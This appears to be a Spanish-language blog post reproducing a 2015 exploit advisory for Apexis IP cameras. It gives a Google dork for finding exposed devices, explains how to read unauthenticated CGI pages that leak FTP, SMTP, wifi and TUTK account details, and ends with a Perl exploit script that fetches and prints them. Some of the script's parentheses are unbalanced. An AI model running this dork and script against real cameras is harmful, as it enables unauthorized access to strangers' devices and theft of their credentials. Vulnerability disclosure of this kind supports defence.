Sunplace

Vulnerabilidad en IP CAM Apexis !! espero les guste !! Advisory # Exploit Title: Apexis IP CAM - Full Info Disclosure # Google Dork: inurl:"get_status.cgi"cgi-bin/ # Date: 01/06/2015 # Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE Remoteexecution.net # Vendor Homepage: http://www.apexis.com.cn/ # Tested on: Linux Como me gusta hablar o escribir demasiado, y como en algún momento me ha pasado de no entender algo, por las dudas lo voy a explicar un poco mas detallado la cosa es simple y fácil de entender ! Googleando el Dork inurl:"get_status.cgi"cgi-bin/ algo así ! Luego ingresando a alguna de ellas, nos dará algo así .... Ok ahora un nivel para abajo, posicionándose en http://url/cgi-bin/ nos mostrara algo así... Bueno uno de los Archivos mas Importantes es el " get_status.cgi o get_tutk_account.cgi " por que es el que nos data lo importante .. http://i.imgur.com/t0Uwqn7.png Listo ahora solo hay que conectarse a http://url/main.html y ya !!! Se puede hacer muchas cosas, desde Conectar y desconectar el wifi, habilitar o desabilitar el FTP, ver los datos de FTP o smp o wifi y varias cosas mas ! Espero que les haya gustado, Ya fue reportado a la empresa y se envió el reporte ademas a Exploit-db Agradecimientos para todos y en especial a Daniel Godoy de #RemoteExecution que se porto en hacer casi todo Como Broche de Cierre el Source del Expliot [Exploit Code] #!/usr/bin/perl print "[ Apexis IP CAM - Full Info Disclosure ]n"; print "[ Discovery by: Sunplace Solutions ]n"; print "[ Exploit: Sunplace Solutions ]n"; print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]n"; print "[Modo de Uso]n"; print "[perl xploit.pl]n"; print "[URL: http://sarasa.oipcam.com/cgi-bin/get_status.gci o /get_tutk_account.cgi]n"; print "[Ahí viene la magia !!! ...........]n"; print "URL: "; $url=<STDIN>; use LWP::UserAgent; my $ua = LWP::UserAgent->new; $ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)'); chop($url); if ($url eq "" { print 'URL dont empty!.'."n"; } else { $www = new LWP::UserAgent; @path=split(/cgi-bin/,$url); $content = $www->get($url) or error(); print "nTrying to pwn =>".$path[1]."n"; print "Result: n"; $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ //g; $pwn=~ s/ret_//g; print $pwn; print "nTrying to pwn => /get_tutk_accountn"; print "Result: n"; $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi" or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/ //g; print $pwn; print "nTrying to pwn => /get_extra_server.cgin"; print "Result: n"; $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi" or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/extra_//g; $pwn=~ s/ //g; print $pwn; }